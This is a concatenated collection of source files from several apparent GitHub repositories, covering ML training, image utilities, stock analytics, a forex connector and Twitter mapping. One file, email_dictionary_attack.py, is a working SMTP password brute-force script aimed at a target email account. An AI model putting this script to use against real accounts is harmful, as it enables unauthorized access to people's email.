feature_extractor_name: str = field(default=None, metadata={"help": "Name or path of preprocessor config."})
freeze_feature_extractor: Optional[bool] = field(
default=True, metadata={"help": "Whether to freeze the feature extractor layers of the model."}
)
attention_mask: Optional[bool] = field(
default=True, metadata={"help": "Whether to generate an attention mask in the feature extractor."}
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu} "
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
logger.info(f"Training/evaluation parameters {training_args}")
# Set seed before initializing model.
set_seed(training_args.seed)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to train from scratch."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Initialize our dataset and prepare it for the audio classification task.
raw_datasets = DatasetDict()
raw_datasets["train"] = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, split=data_args.train_split_name
)
raw_datasets["eval"] = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, split=data_args.eval_split_name
)
if data_args.audio_column_name not in raw_datasets["train"].column_names:
raise ValueError(
f"--audio_column_name {data_args.audio_column_name} not found in dataset '{data_args.dataset_name}'. "
"Make sure to set `--audio_column_name` to the correct audio column - one of "
f"{', '.join(raw_datasets['train'].column_names)}."
)
if data_args.label_column_name not in raw_datasets["train"].column_names:
raise ValueError(
f"--label_column_name {data_args.label_column_name} not found in dataset '{data_args.dataset_name}'. "
"Make sure to set `--label_column_name` to the correct text column - one of "
f"{', '.join(raw_datasets['train'].column_names)}."
)
# Setting `return_attention_mask=True` is the way to get a correctly masked mean-pooling over
# transformer outputs in the classifier, but it doesn't always lead to better accuracy
feature_extractor = AutoFeatureExtractor.from_pretrained(
model_args.feature_extractor_name or model_args.model_name_or_path,
return_attention_mask=model_args.attention_mask,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# `datasets` takes care of automatically loading and resampling the audio,
# so we just need to set the correct target sampling rate.
raw_datasets = raw_datasets.cast_column(
data_args.audio_column_name, datasets.features.Audio(sampling_rate=feature_extractor.sampling_rate)
)
def train_transforms(batch):
"""Apply train_transforms across a batch."""
output_batch = {"input_values": []}
for audio in batch[data_args.audio_column_name]:
wav = random_subsample(
audio["array"], max_length=data_args.max_length_seconds, sample_rate=feature_extractor.sampling_rate
)
output_batch["input_values"].append(wav)
output_batch["labels"] = [label for label in batch[data_args.label_column_name]]
return output_batch
def val_transforms(batch):
"""Apply val_transforms across a batch."""
output_batch = {"input_values": []}
for audio in batch[data_args.audio_column_name]:
wav = audio["array"]
output_batch["input_values"].append(wav)
output_batch["labels"] = [label for label in batch[data_args.label_column_name]]
return output_batch
# Prepare label mappings.
# We'll include these in the model's config to get human readable labels in the Inference API.
labels = raw_datasets["train"].features[data_args.label_column_name].names
label2id, id2label = dict(), dict()
for i, label in enumerate(labels):
label2id[label] = str(i)
id2label[str(i)] = label
# Load the accuracy metric from the datasets package
metric = datasets.load_metric("accuracy")
# Define our compute_metrics function. It takes an `EvalPrediction` object (a namedtuple with
# `predictions` and `label_ids` fields) and has to return a dictionary string to float.
def compute_metrics(eval_pred):
"""Computes accuracy on a batch of predictions"""
predictions = np.argmax(eval_pred.predictions, axis=1)
return metric.compute(predictions=predictions, references=eval_pred.label_ids)
config = AutoConfig.from_pretrained(
model_args.config_name or model_args.model_name_or_path,
num_labels=len(labels),
label2id=label2id,
id2label=id2label,
finetuning_task="audio-classification",
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
model = AutoModelForAudioClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# freeze the convolutional waveform encoder
if model_args.freeze_feature_extractor:
model.freeze_feature_extractor()
if training_args.do_train:
if data_args.max_train_samples is not None:
raw_datasets["train"] = (
raw_datasets["train"].shuffle(seed=training_args.seed).select(range(data_args.max_train_samples))
)
# Set the training transforms
raw_datasets["train"].set_transform(train_transforms, output_all_columns=False)
if training_args.do_eval:
if data_args.max_eval_samples is not None:
raw_datasets["eval"] = (
raw_datasets["eval"].shuffle(seed=training_args.seed).select(range(data_args.max_eval_samples))
)
# Set the validation transforms
raw_datasets["eval"].set_transform(val_transforms, output_all_columns=False)
# Initialize our trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=raw_datasets["train"] if training_args.do_train else None,
eval_dataset=raw_datasets["eval"] if training_args.do_eval else None,
compute_metrics=compute_metrics,
tokenizer=feature_extractor,
)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
trainer.save_model()
trainer.log_metrics("train", train_result.metrics)
trainer.save_metrics("train", train_result.metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
metrics = trainer.evaluate()
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
# Write model card and (optionally) push to hub
kwargs = {
"finetuned_from": model_args.model_name_or_path,
"tasks": "audio-classification",
"dataset": data_args.dataset_name,
"tags": ["audio-classification"],
}
if training_args.push_to_hub:
trainer.push_to_hub(**kwargs)
else:
trainer.create_model_card(**kwargs)
if __name__ == "__main__":
main()
```
|
{
"source": "je-c/pixel_reshaper",
"score": 3
}
|
#### File: je-c/pixel_reshaper/pixel_reshaper.py
```python
import numpy as np
from PIL import Image
import random, csv, os, shutil
def unpack_images(classNames, loc, dirName, splitPercent, dimImage, fileName, containsLabels=True, colorEncode='RGB', pixDtype='float64'):
"""
Unpack an image dataset stored as raw data (csv or otherwise) into .png's.
Creates file structure for easy data loading and handles train/test
splitting internally.
Time complexity - O(3k+N) for classes k, rows N.
Parameters
----------
classNames : list
list of class names
loc : str
location to unpack to
dirName : str
name of directory to create when unpacking data
splitPercent : float
decimal representing percentage of data to retain for test set
dimImage : tuple
a tuple of integers such that (h, w, c) corresponds to height, width and channels
fileName : str
data file name, expects .csv in semi-colon, comma, pipe or tsv format
containsLabels : bool
denotes if labels are present in the dataset, default False, expected label column index = [-1]
colorEncode : str
color encoding for the resulting image, default 'RGB'
pixDtype : str
expected data type for pixels, default 'float64'
Returns
-------
str
file path to the directory containing generated images
"""
counter = {}
labelMap = {}
filePathMap = {
0:{},
1:{}
}
classFilePaths = {
'train':[],
'test':[]
}
for i, j in enumerate(classNames):
labelMap[str(i)] = j
filePathMap[0][str(i)] = ''
filePathMap[1][str(i)] = ''
#Paths for the directory
parentPath = os.path.join(loc, dirName)
trainPath = os.path.join(parentPath, 'train')
testPath = os.path.join(parentPath, 'test')
try:
os.mkdir(parentPath)
os.mkdir(trainPath)
os.mkdir(testPath)
print(f'Directory \'{dirName}\' created')
for cl in classNames:
fpTrain = os.path.join(trainPath, cl)
fpTest = os.path.join(testPath, cl)
classFilePaths['train'].append(fpTrain)
classFilePaths['test'].append(fpTest)
os.mkdir(fpTrain)
os.mkdir(fpTest)
print(f' {cl} class train/test directories created')
for i, itemTrain, itemTest in zip(range(len(classNames)), classFilePaths['train'], classFilePaths['test']):
i = str(i)
filePathMap[0][i] = itemTrain
filePathMap[1][i] = itemTest
except FileExistsError:
print(f'{dirName} already exists - consider deleting the directory for a clean install!')
print(f'Unpacking {fileName}...\nPlease wait...')
with open(fileName) as csv_file:
numSamples = sum(1 for line in csv_file)-1
test_idx = [random.randint(0, numSamples) for i in range(int(numSamples * splitPercent))]
delim = csv.Sniffer().sniff(csv_file.readline())
csv_file.seek(0)
csv_reader = csv.reader(csv_file, delim)
next(csv_reader)
fileCount = 0
for row in csv_reader:
if fileCount % 1000 == 0: print(f'Unpacking {fileCount}/{numSamples}...', end=' ')
if containsLabels: row = row[:-1]
pixels = np.array(row, dtype='float64')
pixels = pixels.reshape(dimImage)
image = Image.fromarray(pixels, colorEncode)
label = row[-1][0]
if label not in counter: counter[label] = 0
counter[label] += 1
filename = f'{labelMap[label]}{counter[label]}.png'
if fileCount in test_idx:
filepath = os.path.join(filePathMap[1][label], filename)
else:
filepath = os.path.join(filePathMap[0][label], filename)
image.save(filepath)
if (fileCount % 999 == 0) and (fileCount != 9): print(f'Completed')
fileCount += 1
print(f'Unpacking complete. {fileCount} images parsed.')
print(f'Directory located at {parentPath}')
return parentPath
def parse_and_dump(loc, dirName, dimImage, pixels=None, active='current', colorEncode='RGB'):
"""
A lightweight handball function for reading single observation tabular data and converting to
image representation, i.e. websocket datastream. Tailored to a pytorch implementation
with an active/archive file system where current 'of-interest' image is handled in a directory
of 1 that is utilised by a classifier, then moved to archive to maintain small dataloader sizes.
Parameters
----------
loc : str
location to unpack to
dirName : str
name of directory to create when unpacking data
dimImage : tuple
a tuple of integers such that (h, w, c) corresponds to height, width and channels
pixels : array-like
array of pixel values to reshape
active : str
name of active folder
colorEncode : str
expected color encoding for resulting image
Returns
-------
str
file path to the directory containing the single image for loading
"""
parentPath = os.path.join(loc, dirName)
currentPath = os.path.join(parentPath, active)
dumpPath = os.path.join(parentPath, 'archive')
try:
os.mkdir(parentPath)
os.mkdir(currentPath)
os.mkdir(dumpPath)
print(f'Directory \'{dirName}\' created')
except FileExistsError:
print(f'{dirName} already exists - pushing image to {currentPath}')
if active == 'current':
filename = 'prediction.png'
filepath = os.path.join(currentPath, filename)
pixels = pixels.reshape(dimImage)
image = Image.fromarray(pixels, colorEncode)
image.save(filepath)
print(f'Image saved to {currentPath}')
else:
num_in_dir = len(os.listdir(dumpPath))
filename = f'prection{num_in_dir + 1}.png'
filepath = os.path.join(dumpPath, filename)
shutil.move(currentPath+'/prediction.png', filepath)
print(f'Image moved to {dumpPath}')
return currentPath
```
|
{
"source": "jecrjunior/algorithms",
"score": 3
}
|
#### File: jecrjunior/algorithms/sendmail.py
```python
import smtplib
le = "\r\n"
def send(from_addr, to_addr_list, cc_addr_list,
subject, message,
login, password,
smtpserver='smtp.gmail.com:587'):
header = 'From: {0}{1}'.format(from_addr, le)
header += 'To: {0}{1}'.format(to_addr_list, le)
header += 'Cc: {0}{1}'.format(cc_addr_list, le)
header += 'Subject: {0}{1}'.format(subject, le)
message = header + message
server = smtplib.SMTP(smtpserver)
server.starttls()
server.login(login,password)
problems = server.sendmail(from_addr, to_addr_list, message)
server.quit()
def set_font_face(text):
return text
#return "<font face=\"verdana\">" + text + "</font>"
lint_file = open("./lint_report.txt", 'r')
lint_report = ""
for line in lint_file.readlines():
lint_report += line
lint_file.close()
test_file = open("./test_report.txt", 'r')
test_report = ""
for line in test_file.readlines():
test_report += line
test_file.close()
report = le
report += "Here is your lint report:{0}".format(le*2)
report += lint_report
report += le*2
report += "Here is your test report:{0}".format(le*2)
report += test_report
report = set_font_face(report)
send('<EMAIL>', ['<EMAIL>'], [], 'Quality results', report, '<EMAIL>', 'fakefakefake')
```
|
{
"source": "jecs580/django_second_app",
"score": 3
}
|
#### File: circles/serializers/circles.py
```python
from rest_framework import serializers
# Model
from cride.circles.models import Circle
class CircleModelSerializer(serializers.ModelSerializer):
"""Serializador para el modelo de Circulo"""
# Usamos estos campos opciones que pueden mandar en el request.
members_limit = serializers.IntegerField(
required=False,
min_value=10,
max_value=3200
) # Cambiamos el valor del members_limit de nos proporciona a para que el numero sea 10 como minimo
is_limited = serializers.BooleanField(
default=False
)
class Meta:
"""Clase Meta"""
model = Circle
fields = (
'id', 'name', 'slug_name',
'about', 'picture', 'rides_offered',
'rides_taken', 'is_public', 'is_limited',
'members_limit'
) # Campos con los que trabajara el serializer para todas las acciones.
read_only_fields = (
'is_public',
'verified',
'rides_offered',
'rides_taken'
) # Son campos que no pueden cambiar, solo podran los admin
def validate(self, data):
"""Se asegura de que members_limit y is_limited esten presentes
o ninguno este presente.
"""
members_limit = data.get('members_limit', None) # Usamos get por el motivo de que no envien el dato
# y lo colocamos como None(ninguna)
is_limited = data.get('is_limited', False)
if is_limited ^ bool(members_limit):
raise serializers.ValidationError('Si el círculo es limitado,debe proveer un límite de miembros')
return data
```
#### File: cride/users/permissions.py
```python
from rest_framework.permissions import BasePermission
class IsAccountOwner(BasePermission):
"""Permite acceso solo a los objetos propiedad del usuario solicitante"""
def has_object_permission(self,request,view,obj):
"""Comprueba que obj y usuario son iguales"""
return request.user == obj # El obj Se usara el objecto que se le coloca en la url, por que se aplicara en retrieve y requiere un username.
# -Retornara True o False, si es False no tendra permiso y si es True si tendra.
# -Este return compara y devuelve directamente, actua como retorno y como un condicional(if)
```
|
{
"source": "JECSand/pandas_sqlalchemy_technical_analysis",
"score": 3
}
|
#### File: JECSand/pandas_sqlalchemy_technical_analysis/pandas_with_sqlalchemy.py
```python
# Package installer function to handle missing packages
def install(package):
print(package + ' package for Python not found, pip installing now....')
pip.main(['install', package])
print(package + ' package has been successfully installed for Python\n Continuing Process...')
try:
from yahoofinancials import YahooFinancials
except:
install('yahoofinancials')
from yahoofinancials import YahooFinancials
try:
import pandas as pd
import numpy as np
except:
install('pandas')
import pandas as pd
import numpy as np
try:
import sqlalchemy
from sqlalchemy import *
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Numeric, DateTime
from sqlalchemy.orm import sessionmaker
except:
install('sqlalchemy')
import sqlalchemy
from sqlalchemy import *
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Numeric, DateTime
from sqlalchemy.orm import sessionmaker
'''
Script Setup Variables
'''
# Enter your PostgreSQL Database Information here
user_name = 'username'
password = 'password'
host = 'host/end-point'
port = 'port'
database = 'database_name'
db_conn_str = 'postgresql://' + user_name + ':' + password + '@' + host + ':' + port + '/' + database
# Connect to the AWS PostgreSQL Database
engine = create_engine(db_conn_str)
Base = declarative_base()
conn = engine.connect()
# Select Tickers and stock history dates
ticker = 'AAPL'
ticker2 = 'MSFT'
ticker3 = 'INTC'
index = '^NDX'
freq = 'daily'
start_date = '2012-10-01'
end_date = '2017-10-01'
# Model Tables and create if they do not exist
metadata = MetaData()
rsiTable = Table('rsiTable', metadata,
Column('id', Integer, primary_key=True),
Column('Date', DateTime),
Column('NDX', Numeric),
Column('AAPL', Numeric),
Column('MSFT',Numeric),
Column('INTL', Numeric)
)
betaTable = Table('betaTable', metadata,
Column('id', Integer, primary_key=True),
Column('Date', DateTime),
Column('AAPL', Numeric),
Column('MSFT', Numeric),
Column('INTL', Numeric)
)
rsiTable.create(engine)
betaTable.create(engine)
#Declaration of the RSI Table class in order to write RSI Data into the database.
class RSITable(Base):
__tablename__ = 'rsiTable'
id = Column(Integer, primary_key=True)
Date = Column(DateTime())
NDX = Column(Numeric())
AAPL = Column(Numeric())
MSFT = Column(Numeric())
INTL = Column(Numeric())
def __repr__(self):
return "(id='%s', Date='%s', NDX='%s', AAPL='%s, MSFT='%s', INTL='%s')" % \
(self.id, self.Date, self.NDX, self.AAPL, self.MSFT, self.INTL)
# Declaration of the Beta Table class in order to write Beta Data into the database.
class BetaTable(Base):
__tablename__ = 'betaTable'
id = Column(Integer, primary_key=True)
Date = Column(DateTime())
AAPL = Column(Numeric())
MSFT = Column(Numeric())
INTL = Column(Numeric())
def __repr__(self):
return "(id='%s', Date='%s', AAPL='%s, MSFT='%s', INTL='%s')" % \
(self.id, self.Date, self.AAPL, self.MSFT, self.INTL)
# Function to clean data extracts
def clean_stock_data(stock_data_list):
new_list = []
for rec in stock_data_list:
if 'type' not in rec.keys():
new_list.append(rec)
return new_list
# Construct yahoo financials objects for data extraction
aapl_financials = YahooFinancials(ticker)
mfst_financials = YahooFinancials(ticker2)
intl_financials = YahooFinancials(ticker3)
index_financials = YahooFinancials(index)
# Clean returned stock history data and remove dividend events from price history
daily_aapl_data = clean_stock_data(aapl_financials
.get_historical_stock_data(start_date, end_date, freq)[ticker]['prices'])
daily_msft_data = clean_stock_data(mfst_financials
.get_historical_stock_data(start_date, end_date, freq)[ticker2]['prices'])
daily_intl_data = clean_stock_data(intl_financials
.get_historical_stock_data(start_date, end_date, freq)[ticker3]['prices'])
daily_index_data = index_financials.get_historical_stock_data(start_date, end_date, freq)[index]['prices']
stock_hist_data_list = [{'NDX': daily_index_data}, {'AAPL': daily_aapl_data}, {'MSFT': daily_msft_data},
{'INTL': daily_intl_data}]
'''
Stock Beta Algorithm
'''
# Function to construct data frame based on a stock and it's market index
def build_beta_data_frame(data_list1, data_list2, data_list3, data_list4):
data_dict = {}
i = 0
for list_item in data_list2:
if 'type' not in list_item.keys():
data_dict.update({list_item['formatted_date']: {'NDX': data_list1[i]['close'], 'AAPL': list_item['close'],
'MSFT': data_list3[i]['close'],
'INTL': data_list4[i]['close']}})
i += 1
tseries = pd.to_datetime(list(data_dict.keys()))
df = pd.DataFrame(data=list(data_dict.values()), index=tseries,
columns=['NDX', 'AAPL', 'MSFT', 'INTL']).sort_index()
return df
# Function to create the groupby object ready for beta analysis
def roll_function(df, w):
roll_array = np.dstack([df.values[i:i+w, :] for i in range(len(df.index) - w + 1)]).T
panel = pd.Panel(roll_array,
items=df.index[w-1:],
major_axis=df.columns,
minor_axis=pd.Index(range(w), name='roll'))
return panel.to_frame().unstack().T.groupby(level=0)
# Function to calculate Stock Beta
def calc_beta(df):
X = df.values[:, [0]]
X = np.concatenate([np.ones_like(X), X], axis=1)
b = np.linalg.pinv(X.T.dot(X)).dot(X.T).dot(df.values[:, 1:])
return pd.Series(b[1], df.columns[1:], name='Beta')
# Function to kick off stock beta calculation process
def get_stock_beta_df():
df = build_beta_data_frame(daily_index_data, daily_aapl_data, daily_msft_data, daily_intl_data)
roll_df = roll_function(df, 260)
beta_vals = roll_df.apply(calc_beta)
return beta_vals
'''
Stock RSI Algorithm
'''
# Function to build stock price series
def build_price_series(data_list):
series_data_list = []
series_date_list = []
for list_item in data_list:
series_data_list.append(list_item['close'])
series_date_list.append(list_item['formatted_date'])
tseries = pd.to_datetime(series_date_list)
ds = pd.Series(series_data_list, index=tseries).sort_index(ascending=True)
return ds
# Function to calculate stock's RSI
def calc_stock_rsi(prices, n=14):
gain = (prices-prices.shift(1)).fillna(0)
def calc_rsi(price):
avg_gain = price[price>0].sum()/n
avg_loss = -price[price<0].sum()/n
rs = avg_gain/avg_loss
return 100 - 100/(1+rs)
return pd.rolling_apply(gain,n,calc_rsi)
# Function to kick off stock rsi calculation process
def get_stock_rsi_df():
ds_list = []
column_list = []
for li_dict in stock_hist_data_list:
for k, v in li_dict.items():
ds = build_price_series(v)
rsi_vals = calc_stock_rsi(ds)
ds_list.append(rsi_vals)
column_list.append(k)
df = pd.concat(ds_list, axis=1)
df.columns = column_list
return df
# Main Function of the Script
def main():
rsi_df = get_stock_rsi_df()
beta_df = get_stock_beta_df()
rsi_df.reset_index(inplace=True)
rsi_df.rename(columns={'index': 'Date'}, inplace=True)
beta_df.reset_index(inplace=True)
beta_df.rename(columns={'index': 'Date'}, inplace=True)
print('Beta Dataframe: ')
print(beta_df)
print('\nRSI Dataframe')
print(rsi_df)
rsiTableToWriteTo = 'rsiTable'
betaTableToWriteTo = 'betaTable'
rsi_df.to_sql(name=rsiTableToWriteTo, con=engine, if_exists='append', index=False)
beta_df.to_sql(name=betaTableToWriteTo, con=engine, if_exists='append', index=False)
Session = sessionmaker(bind=engine)
session = Session()
session.commit()
session.close()
print('Process Complete! New Beta and RSI Data is now available in your PostgreSQL Database!')
main()
```
|
{
"source": "JECSand/sample_pen_testing_toolkit",
"score": 3
}
|
#### File: JECSand/sample_pen_testing_toolkit/email_dictionary_attack.py
```python
import smtplib
import os
import sys
# Email Server Dictionary
available_server_dict ={'gmail.com': 'smtp.gmail.com', 'hotmail.com': 'smtp.live.com',
'live.com': 'smtp.live.com', 'yahoo.com': 'smtp.mail.yahoo.com',
'ymail.com': 'smtp.mail.yahoo.com', 'yahoo.co.uk': 'smtp.mail.yahoo.com',
'sbcglobal.net': 'smtp.mail.att.net', 'prodigy.net': 'smtp.mail.att.net',
'windstream.net': 'smtp.windstream.net', 'comcast.net': 'smtp.comcast.net'}
# OS Specific Parameters
os_system = os.name
if os_system == 'nt':
dict_dir = '\\dictionaries\\'
else:
dict_dir = '/dictionaries/'
# Function to get user name based on inputted email string
def get_server_conn_string(email_string, email_service):
parsed_email_domain = str(email_string.split('@')[1])
if parsed_email_domain in available_server_dict.keys():
smtp_string = available_server_dict[parsed_email_domain]
else:
smtp_string = available_server_dict[email_service]
return smtp_string
# Function to run dictionary attack
def run_dict_attack(target_email, selected_dictionary, email_service='gmail.com', port=587):
server_conn_string = get_server_conn_string(target_email, email_service)
smtpserver = smtplib.SMTP(server_conn_string, port)
smtpserver.ehlo()
smtpserver.starttls()
cwd = os.getcwd()
sel_dict = open(cwd + dict_dir + selected_dictionary, "r")
for word in sel_dict:
try:
smtpserver.login(target_email, word)
print("[*]--------> Success!\n [*]----------> User's Password Determined: " + word)
break
except smtplib.SMTPAuthenticationError:
print("[!]--------> Incorrect Password: " + word)
if __name__ == "__main__":
sys_arg_list = sys.argv
len_sys_arg = len(sys.argv)
print(len_sys_arg)
if len_sys_arg == 3:
run_dict_attack(sys.argv[1], sys.argv[2])
elif len_sys_arg == 4:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3])
elif len_sys_arg == 5:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))
else:
print("[!]--------> Incorrect number of script parameters entered!")
sys.exit(1)
```
|
{
"source": "JECSand/tradebots",
"score": 2
}
|
#### File: tradebots/connectors/oanda_connector.py
```python
import sys
import json
import datetime
import tradebots.utils.request_utils as request_utils
import tradebots.utils.math_utils as math_utils
import tradebots.utils.datetime_utils as datetime_utils
# Oanda Scale Mapping
time_scaling_map = {
'S': 'seconds',
'M': 'minutes',
'H': 'hours',
'D': 'days',
'W': 'weeks',
'M1': 'months'
}
# Class that instantiates a new Oanda Connection
class OandaConnector(object):
# Initialize an Oanda Connection Object
def __init__(self, secret_token, account_id, symbol, practice):
# Function that checks if token is valid
def check_settings(check_account_id, base_url, base_headers, check_type, check_symbol=None):
if check_type == 'accounts':
get_url = base_url + '/v3/accounts'
check_key = 'id'
check_param = check_account_id
else:
get_url = base_url + '/v3/accounts/' + check_account_id + '/instruments'
check_key = 'name'
check_param = check_symbol
try:
get_req = request_utils.get_request(get_url, base_headers)
if get_req.code != 200:
print('setup error: Token is not recognized by Oanda')
sys.exit(1)
else:
res_list = json.loads(get_req.read()).get(check_type, None)
if res_list is not None and len(res_list) > 0:
for res_obj in res_list:
if res_obj.get(check_key, None) == check_param:
return res_obj
print(str(check_type) + ' setup error: ' + str(check_param) + ' is not recognized by Oanda')
sys.exit(1)
except:
print('setup error: Token is not recognized by Oanda')
sys.exit(1)
# Object Initialization Variables
self.practice = practice
self.base_headers = {"Authorization": 'Bearer ' + str(secret_token)}
if practice is True:
self.base_url = 'https://api-fxpractice.oanda.com'
self.base_streaming_url = 'https://stream-fxpractice.oanda.com/'
else:
self.base_url = 'https://api-fxtrade.oanda.com'
self.base_streaming_url = 'https://stream-fxtrade.oanda.com/'
self.account_id = account_id
self.secret_token = secret_token
check_settings(self.account_id, self.base_url, self.base_headers, 'accounts')
self.symbol = symbol.replace('/', '_')
self.symbol_dict = check_settings(self.account_id, self.base_url, self.base_headers, 'instruments', self.symbol)
self.granularity_meta = {''}
# Private Static Method to generate historical candle stick req URL
@staticmethod
def _generate_candle_stick_url(base_get_url, price, granularity, start, end, smoothed, count):
i = 0
if price is not None:
base_get_url += '?price=' + str(price)
i += 1
if granularity is not None:
if i == 0:
base_get_url += '?granularity=' + str(granularity)
else:
base_get_url += '&granularity=' + str(granularity)
i += 1
if count is not None:
if i == 0:
base_get_url += '?count=' + str(count)
else:
base_get_url += '&count=' + str(count)
i += 1
if start is not None:
if i == 0:
base_get_url += '?from=' + str(start).replace(':', '%3A')
else:
base_get_url += '&from=' + str(start).replace(':', '%3A')
i += 1
if end is not None:
base_get_url += '&to=' + str(end).replace(':', '%3A')
if smoothed is not None:
if i == 0:
base_get_url += '?smoothed=' + str(smoothed)
else:
base_get_url += '&smoothed=' + str(smoothed)
return base_get_url
# Public Method that returns a dictionary of historical candle stick values
def historical_candle_sticks(self, price=None, granularity=None, start=None, end=None, smoothed=None, count=None):
start_dt = datetime.datetime.strptime(start.split('.')[0] + 'Z', '%Y-%m-%dT%H:%M:%SZ')
end_dt = datetime.datetime.strptime(end.split('.')[0] + 'Z', '%Y-%m-%dT%H:%M:%SZ')
scale = "".join([i for i in granularity if i.isalpha()])
interval = "".join([i for i in granularity if i.isdigit()])
time_scale = time_scaling_map[scale]
num_observations_data = math_utils.calc_num_of_observations(start_dt, end_dt, interval, time_scale)
num_observations = num_observations_data[0]
scaled_interval = num_observations_data[1]
print(num_observations)
seconds_per_request = int(scaled_interval * 3000)
num_of_requests = int(num_observations / 3000)
date_ranges_list = datetime_utils.generate_dt_range_map(num_of_requests, seconds_per_request, end_dt, start_dt)
base_get_url = self.base_url + '/v3/instruments/' + self.symbol + '/candles'
appended_re_candle_data = []
re_data = {}
for datetime_list in date_ranges_list:
c_start = datetime_list[0].isoformat("T") + "Z"
c_end = datetime_list[1].isoformat("T") + "Z"
get_url = self._generate_candle_stick_url(base_get_url, price, granularity, c_start, c_end, smoothed, count)
try:
print(get_url)
get_req = request_utils.get_request(get_url, self.base_headers)
if get_req:
if get_req.code != 200:
appended_re_candle_data.append({c_start + ' to ' + c_end: False})
else:
re_data = json.loads(get_req.read())
if len(appended_re_candle_data) > 0:
appended_re_candle_data += re_data['candles']
else:
appended_re_candle_data = re_data['candles']
except:
appended_re_candle_data.append({c_start + ' to ' + c_end: None})
re_data['candles'] = appended_re_candle_data
return re_data
# Public Method that returns a dictionary of current pricing data
def current_pricing_data(self):
get_url = self.base_url + '/v3/accounts/' + self.account_id + '/pricing?instruments=' + self.symbol
try:
get_req = request_utils.get_request(get_url, self.base_headers)
if get_req.code != 200:
return False
return json.loads(get_req.read())
except:
return False
# Public Method that returns a dictionary of current bollinger band values
def bollinger_band_data(self, granularity, current=True, start=None, end=None):
if current is True:
# get last 20 days worth of candle stick data for submitted granularity; if less than M10, run multiple pulls
end_dt = datetime.datetime.utcnow()
start_dt = end_dt - datetime.timedelta(days=22)
end = end_dt.isoformat("T") + "Z"
start = start_dt.isoformat("T") + "Z"
candle_sticks = self.historical_candle_sticks(None, granularity, start, end)
#TODO Calculate Bollinger Bands
return None
else:
pass
pass
# Public Method that executes an open trade order
def open_trade(self):
pass
# Public Method that executes a close trade order
def close_trade(self):
pass
```
|
{
"source": "JECSand/Twitter_Analytics",
"score": 3
}
|
#### File: JECSand/Twitter_Analytics/twitter_batched_geomap.py
```python
import os
import json
import random
import pip
import webbrowser
import config
# Package installer function to handle missing packages
def install(package):
print(package + ' package for Python not found, pip installing now....')
pip.main(['install', package])
print(package + ' package has been successfully installed for Python\n Continuing Process...')
try:
from geopy.geocoders import Nominatim
except:
install('geopy')
from geopy.geocoders import Nominatim
geolocator = Nominatim()
cwd = os.getcwd()
os_system = os.name
if os_system == 'nt':
raw_tweet_file_dir = cwd + '\\batch_extracts\\complete\\'
browser_map_dir = cwd + '\\browser_map\\'
geo_json_dir = browser_map_dir + '\\geojson\\'
else:
raw_tweet_file_dir = cwd + '/batch_extracts/complete/'
browser_map_dir = cwd + '/browser_map/'
geo_json_dir = browser_map_dir + '/geojson/'
# Function to get data from twitter batch files
def get_twitter_batch():
raw_tweets_list = []
for root, dirnames, filenames in os.walk(raw_tweet_file_dir):
for filename in filenames:
with open(os.path.join(root, filename), 'r') as raw_tweet_file:
for raw_tweet_json in raw_tweet_file:
raw_tweet = json.loads(raw_tweet_json)
raw_tweets_list.append(raw_tweet)
raw_tweet_file.close()
return raw_tweets_list
# Function to construct geojson feature
def get_geojson_feature(coordinates, text, created_at):
geo_json_feature = {
"type": "Feature",
"geometry": coordinates,
"properties": {
"text": text,
"created_at": created_at
}
}
return geo_json_feature
# Tweets are stored in "fname"
geo_data = {
"type": "FeatureCollection",
"features": []
}
print('Building geojson file\nThis may take a moment....')
for tweet in get_twitter_batch():
if tweet['lang'] == 'en':
if tweet['coordinates']:
